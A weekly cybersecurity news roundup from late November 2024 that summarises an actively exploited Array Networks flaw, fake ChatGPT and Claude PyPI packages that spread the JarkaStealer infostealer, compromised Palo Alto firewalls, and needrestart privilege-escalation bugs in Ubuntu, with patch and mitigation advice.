11/20/2024-11/27/2024 Critical “Array Networks” Flaw, PyPI Attack, Palo Alto Networks Firewalls Compromised And More.

1. CISA Urges Agencies to Patch Critical “Array Networks” Flaw Amid Active

AttacksCISA has added a critical vulnerability in Array Networks AG and vxAG secure access gateways (CVE-2023-28461) to its Known Exploited Vulnerabilities (KEV) catalog after reports of active exploitation. This flaw (CVSS score: 9.8) allows remote code execution without authentication via a vulnerable URL and was patched in March 2023 (version 9.4.0.484). Trend Micro linked the vulnerability to China-based cyber espionage group Earth Kasha, which targets Japanese entities and, increasingly, Taiwan, India, and Europe. Earth Kasha has exploited flaws in Array AG, Proself, and Fortinet FortiOS for initial access. ESET recently exposed a campaign by the group using the upcoming World Expo 2025 as a lure to deliver malware. CISA advises agencies to apply patches by December 16, 2024. Over 440,000 internet-exposed systems remain at risk.

2. PyPI Attack: ChatGPT, Claude Impersonators Deliver JarkaStealer via Python Libraries

Researchers have identified two malicious packages on the Python Package Index (PyPI), gptplus and claudeai-eng, impersonating popular AI models OpenAI ChatGPT and Anthropic Claude to distribute the information stealer JarkaStealer. Uploaded by “Xeroline” in November 2023, the packages attracted over 3,500 downloads before being removed. Marketed as tools to access GPT-4 Turbo and Claude AI APIs, they concealed malicious code that deployed malware upon installation. The packages’ __init__.py file contained encoded code to download a Java-based stealer, JavaUpdater.jar, from GitHub and install Java Runtime Environment if needed. Once executed, JarkaStealer harvested sensitive data, including browser data, screenshots, and app session tokens (Telegram, Discord, Steam). The stolen data was archived, sent to the attacker’s server, and deleted from the victim’s system. Sold as malware-as-a-service (MaaS) for $20–$50 on Telegram, JarkaStealer’s source code has also leaked online. 

3. 2,000 Palo Alto Networks Firewalls Compromised

A recent campaign exploiting two vulnerabilities has compromised around 2,000 Palo Alto Networks firewalls, according to Shadowserver researchers. The flaws include a critical authentication bypass (CVE-2024-0012, severity 9.3) and a medium-severity privilege escalation bug (CVE-2024-9474, severity 6.9), which can be chained for attacks. CVE-2024-0012 allows unauthenticated attackers with access to the management interface to gain admin privileges, tamper with configurations, or exploit CVE-2024-9474. The flaws, disclosed earlier in November, affect certain PAN-OS 10.2–11.2 deployments on PA-Series, VM-Series, CN-Series, and Panorama devices but not Cloud NGFW or Prisma Access.

Palo Alto Networks disputes Shadowserver’s numbers, stating fewer than 0.5% of customer firewalls have internet-exposed interfaces and that the impact is “limited.” The company emphasizes securing management interfaces to reduce risks. 

4. Decades-Old Security Vulnerabilities Found in Ubuntu’s Needrestart Package

The Qualys Threat Research Unit (TRU) has uncovered five Local Privilege Escalation (LPE) vulnerabilities in Ubuntu’s needrestart package, enabling local attackers to gain root privileges without user interaction. The flaws, introduced in version 0.8 (April 2014), affect Ubuntu Server systems with needrestart installed by default since version 21.04.

The vulnerabilities are tracked as CVE-2024-48990, CVE-2024-48991, CVE-2024-48992, CVE-2024-10224, and CVE-2024-11003. They allow attackers to execute arbitrary code as root by exploiting issues with interpreter environment variables (Python/Ruby) or race conditions.

Qualys warns that these vulnerabilities, with CVSS scores up to 7.8, are highly exploitable and could soon see public exploits, posing severe risks like unauthorized access, malware, and system compromise.

Mitigation includes disabling interpreter scanning by adding $nrconf{interpscan} = 0; to /etc/needrestart/needrestart.conf. Enterprises should update needrestart immediately to avoid operational disruptions and data breaches.